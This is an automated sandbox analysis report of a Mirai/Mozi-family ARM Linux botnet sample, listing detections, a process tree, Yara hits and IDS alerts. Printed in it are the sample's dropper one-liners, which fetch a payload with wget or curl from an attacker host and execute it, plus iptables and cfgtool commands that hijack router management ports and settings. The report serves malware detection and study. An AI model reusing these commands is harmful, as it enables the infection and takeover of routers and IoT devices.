Loading ...

Play interactive tourEdit tour

Analysis Report KnAY2OIPI3

Overview

General Information

Sample Name:KnAY2OIPI3
Analysis ID:402062
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • KnAY2OIPI3 (PID: 4577, Parent: 4516, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/KnAY2OIPI3
    • KnAY2OIPI3 New Fork (PID: 4594, Parent: 4577)
      • KnAY2OIPI3 New Fork (PID: 4596, Parent: 4594)
        • sh (PID: 4598, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 4600, Parent: 4598)
          • killall (PID: 4600, Parent: 4598, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • KnAY2OIPI3 New Fork (PID: 4619, Parent: 4596)
          • sh (PID: 4632, Parent: 4619, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT"
            • sh New Fork (PID: 4635, Parent: 4632)
            • iptables (PID: 4635, Parent: 4632, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT
              • iptables New Fork (PID: 4647, Parent: 4635)
              • modprobe (PID: 4647, Parent: 4635, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • sh (PID: 4666, Parent: 4619, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT"
            • sh New Fork (PID: 4668, Parent: 4666)
            • iptables (PID: 4668, Parent: 4666, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT
          • sh (PID: 4669, Parent: 4619, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT"
            • sh New Fork (PID: 4671, Parent: 4669)
            • iptables (PID: 4671, Parent: 4669, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT
          • sh (PID: 4700, Parent: 4619, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT"
            • sh New Fork (PID: 4707, Parent: 4700)
            • iptables (PID: 4707, Parent: 4700, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 38798 -j ACCEPT
          • sh (PID: 4724, Parent: 4619, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 38798 -j ACCEPT"
            • sh New Fork (PID: 4733, Parent: 4724)
            • iptables (PID: 4733, Parent: 4724, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 38798 -j ACCEPT
          • sh (PID: 4748, Parent: 4619, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT"
            • sh New Fork (PID: 4754, Parent: 4748)
            • iptables (PID: 4754, Parent: 4748, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 38798 -j ACCEPT
          • sh (PID: 4767, Parent: 4619, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT"
            • sh New Fork (PID: 4772, Parent: 4767)
            • iptables (PID: 4772, Parent: 4767, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 38798 -j ACCEPT
          • sh (PID: 4774, Parent: 4619, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT"
            • sh New Fork (PID: 4776, Parent: 4774)
            • iptables (PID: 4776, Parent: 4774, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 38798 -j ACCEPT
        • sh (PID: 4809, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4811, Parent: 4809)
          • iptables (PID: 4811, Parent: 4809, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • sh (PID: 4812, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4814, Parent: 4812)
          • iptables (PID: 4814, Parent: 4812, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • sh (PID: 4816, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4823, Parent: 4816)
          • iptables (PID: 4823, Parent: 4816, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • sh (PID: 4836, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4846, Parent: 4836)
          • iptables (PID: 4846, Parent: 4836, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • sh (PID: 4863, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • sh (PID: 4873, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • sh (PID: 4885, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4894, Parent: 4885)
          • iptables (PID: 4894, Parent: 4885, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • sh (PID: 4911, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4920, Parent: 4911)
          • iptables (PID: 4920, Parent: 4911, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • sh (PID: 4940, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 4944, Parent: 4940)
          • iptables (PID: 4944, Parent: 4940, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • sh (PID: 4946, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 4948, Parent: 4946)
          • iptables (PID: 4948, Parent: 4946, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • sh (PID: 4952, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 4957, Parent: 4952)
          • iptables (PID: 4957, Parent: 4952, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • sh (PID: 4970, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 4980, Parent: 4970)
          • iptables (PID: 4980, Parent: 4970, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • sh (PID: 5019, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5021, Parent: 5019)
          • iptables (PID: 5021, Parent: 5019, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • sh (PID: 5022, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5024, Parent: 5022)
          • iptables (PID: 5024, Parent: 5022, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • sh (PID: 5026, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5032, Parent: 5026)
          • iptables (PID: 5032, Parent: 5026, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • sh (PID: 5045, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5053, Parent: 5045)
          • iptables (PID: 5053, Parent: 5045, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • sh (PID: 5072, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5080, Parent: 5072)
          • iptables (PID: 5080, Parent: 5072, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • sh (PID: 5100, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5107, Parent: 5100)
          • iptables (PID: 5107, Parent: 5100, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • sh (PID: 5133, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT"
          • sh New Fork (PID: 5135, Parent: 5133)
          • iptables (PID: 5135, Parent: 5133, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 18022 -j ACCEPT
        • sh (PID: 5139, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT"
          • sh New Fork (PID: 5149, Parent: 5139)
          • iptables (PID: 5149, Parent: 5139, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 18022 -j ACCEPT
        • sh (PID: 5167, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT"
          • sh New Fork (PID: 5172, Parent: 5167)
          • iptables (PID: 5172, Parent: 5167, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 18022 -j ACCEPT
        • sh (PID: 5177, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT"
          • sh New Fork (PID: 5186, Parent: 5177)
          • iptables (PID: 5186, Parent: 5177, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 18022 -j ACCEPT
        • sh (PID: 5206, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 18022 -j ACCEPT"
          • sh New Fork (PID: 5210, Parent: 5206)
          • iptables (PID: 5210, Parent: 5206, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 18022 -j ACCEPT
        • sh (PID: 5218, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT"
          • sh New Fork (PID: 5227, Parent: 5218)
          • iptables (PID: 5227, Parent: 5218, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 18022 -j ACCEPT
        • sh (PID: 5245, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT"
          • sh New Fork (PID: 5249, Parent: 5245)
          • iptables (PID: 5249, Parent: 5245, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 18022 -j ACCEPT
        • sh (PID: 5250, Parent: 4596, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT"
          • sh New Fork (PID: 5252, Parent: 5250)
          • iptables (PID: 5252, Parent: 5250, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 18022 -j ACCEPT
  • upstart New Fork (PID: 5286, Parent: 3310)
  • sh (PID: 5286, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5287, Parent: 5286)
    • date (PID: 5287, Parent: 5286, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5304, Parent: 5286)
    • apport-checkreports (PID: 5304, Parent: 5286, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 5313, Parent: 3310)
  • sh (PID: 5313, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5314, Parent: 5313)
    • date (PID: 5314, Parent: 5313, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5315, Parent: 5313)
    • apport-gtk (PID: 5315, Parent: 5313, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 5340, Parent: 3310)
  • sh (PID: 5340, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 5341, Parent: 5340)
    • date (PID: 5341, Parent: 5340, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 5357, Parent: 5340)
    • apport-gtk (PID: 5357, Parent: 5340, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
KnAY2OIPI3SUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
KnAY2OIPI3JoeSecurity_Mirai_8Yara detected MiraiJoe Security
    KnAY2OIPI3JoeSecurity_Mirai_9Yara detected MiraiJoe Security
      KnAY2OIPI3JoeSecurity_Mirai_4Yara detected MiraiJoe Security

        PCAP (Network Traffic)

        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_Mirai_4Yara detected MiraiJoe Security

          Dropped Files

          SourceRuleDescriptionAuthorStrings
          /usr/networksSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
          • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
          /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus / Scanner detection for submitted sampleShow sources
                Source: KnAY2OIPI3Avira: detected
                Antivirus detection for dropped fileShow sources
                Source: /usr/networksAvira: detection malicious, Label: LINUX/Mirai.lldau
                Multi AV Scanner detection for submitted fileShow sources
                Source: KnAY2OIPI3Virustotal: Detection: 67%Perma Link
                Source: KnAY2OIPI3Metadefender: Detection: 51%Perma Link
                Source: KnAY2OIPI3ReversingLabs: Detection: 68%

                Spreading:

                barindex
                Found strings indicative of a multi-platform dropperShow sources
                Source: KnAY2OIPI3String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: KnAY2OIPI3String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                Source: KnAY2OIPI3String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Opens /proc/net/* files useful for finding connected devices and routersShow sources
                Source: /tmp/KnAY2OIPI3 (PID: 4619)Opens: /proc/net/route
                Source: /tmp/KnAY2OIPI3 (PID: 4619)Opens: /proc/net/route

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.208.214.175: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.56.89.143: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.18.148.170: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 124.156.101.207: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.229.152.239: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.223.72.66: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.98.239.62: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.96.182.253: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.130.196.195: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 222.230.159.253: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.228.94.133: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.167.218.252: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:54872 -> 136.0.253.113:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:54872 -> 136.0.253.113:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 41.182.36.137: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 136.244.87.126: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 31.19.63.66: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 85.149.76.115: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.255.14.222: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 91.185.16.166: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.134.224.32: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.57.181: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 66.42.66.94: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.22.77.17: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.202.31.56: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 73.172.240.32: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.134.247.160: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.2.161.23: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.16.40.146: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 109.196.48.13: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 173.222.98.151:80 -> 192.168.2.20:33522
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:33522 -> 173.222.98.151:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:51310 -> 67.161.57.86:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:51310 -> 67.161.57.86:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56338 -> 72.43.231.74:8080
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56338 -> 72.43.231.74:8080
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.6.114.154: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.180.130.70: -> 192.168.2.20:
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44236
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44236
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.200.129.165: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 213.163.127.204:11211 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 32.112.192.2: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.78.190.57: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.138.106:3132 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 118.98.102.31: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.103.89.237: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 125.25.5.1: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 47.104.191.32:4748 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.223.65.103: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 195.10.10.214: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 81.229.230.103:33561 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44522
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44522
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 203.115.91.51:34352 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.45.90:11211 -> 192.168.2.20:18022
                Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 187.20.92.69:23 -> 192.168.2.20:44526
                Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 187.20.92.69:23 -> 192.168.2.20:44526
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.196.202.142: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.175.137: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 156.240.25.185: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.169.194.165: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.98.24.191: -> 192.168.2.20:
